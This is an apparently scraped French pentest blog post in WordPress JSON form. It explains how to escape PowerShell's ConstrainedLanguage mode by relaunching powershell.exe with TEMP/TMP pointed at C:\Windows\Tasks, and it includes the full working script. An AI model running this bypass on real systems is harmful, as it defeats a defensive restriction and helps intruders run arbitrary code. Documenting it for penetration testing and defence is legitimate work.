Lors d’un pentest il arrive de plus en plus fr\u00e9quemment de rencontrer des difficult\u00e9s \u00e0 ex\u00e9cuter des scripts Powershell car celui-ci bien que pr\u00e9sent est configur\u00e9 en mode \u00ab\u00a0ConstrainedLanguage\u00a0\u00bb. Pour le v\u00e9rifier :<\/p>\n\n\n\n
$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage <\/pre>\n\n\n\nIl y a forc\u00e9ment plusieurs fa\u00e7ons d’arriver au mode \u00ab\u00a0FullLanguage\u00a0\u00bb mais en voici une qui fonctionne quasi syst\u00e9matiquement. La seule condition est d’avoir le droit d’\u00e9criture et d’ex\u00e9cution dans un r\u00e9pertoire (sans \u00eatre bloqu\u00e9 par AppLocker par exemple).<\/p>\n\n\n\n
L’astuce consiste \u00e0 lancer l’ex\u00e9cutable powershell.exe en lui passant en variable d’environnement un TEMP accessible justement en \u00e9criture et ex\u00e9cution. Habituellement le r\u00e9pertoire C:\\Windows\\Tasks fait l’affaire.<\/p>\n\n\n\n
$CMDLine = \"$PSHOME\\powershell.exe\"\n[String[]] $EnvVarsExceptTemp = Get-ChildItem Env:\\* -Exclude \"TEMP\",\"TMP\"| % { \"$($_.Name)=$($_.Value)\" }\n$TEMPBypassPath = \"Temp=C:\\Windows\\Tasks\"\n$TMPBypassPath = \"TMP=C:\\Windows\\Tasks\"\n$EnvVarsExceptTemp += $TEMPBypassPath\n$EnvVarsExceptTemp += $TMPBypassPath\n$StartParamProperties = @{ EnvironmentVariables = $EnvVarsExceptTemp }\n$StartParams = New-CimInstance -ClassName Win32_ProcessStartup -ClientOnly -Property $StartParamProperties\nInvoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{\nCommandLine = $CMDLine\nProcessStartupInformation = $StartParams\n} <\/pre>\n\n\n\nL’ex\u00e9cution de ce script a pour effet d’ouvrir une nouvelle fen\u00eatre Powershell avec tous les droits. Pour le v\u00e9rifier :<\/p>\n\n\n\n
$ExecutionContext.SessionState.LanguageMode\nFullLanguage <\/pre>\n\n\n\n<\/p>\n","protected":false},"excerpt":{"rendered":"
Lors d’un pentest il arrive de plus en plus fr\u00e9quemment de rencontrer des difficult\u00e9s \u00e0 ex\u00e9cuter des scripts Powershell car celui-ci bien que pr\u00e9sent est configur\u00e9 en mode \u00ab\u00a0ConstrainedLanguage\u00a0\u00bb. Pour le v\u00e9rifier : $ExecutionContext.SessionState.LanguageModeConstrainedLanguage Il y a forc\u00e9ment plusieurs fa\u00e7ons d’arriver au mode \u00ab\u00a0FullLanguage\u00a0\u00bb mais en voici une qui fonctionne quasi syst\u00e9matiquement. La seule condition … Continuer la lecture de Powershell, de ConstrainedLanguage \u00e0 FullLanguage<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-519","post","type-post","status-publish","format-standard","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/519","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=519"}],"version-history":[{"count":8,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/519\/revisions"}],"predecessor-version":[{"id":529,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/519\/revisions\/529"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=519"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=519"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=519"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}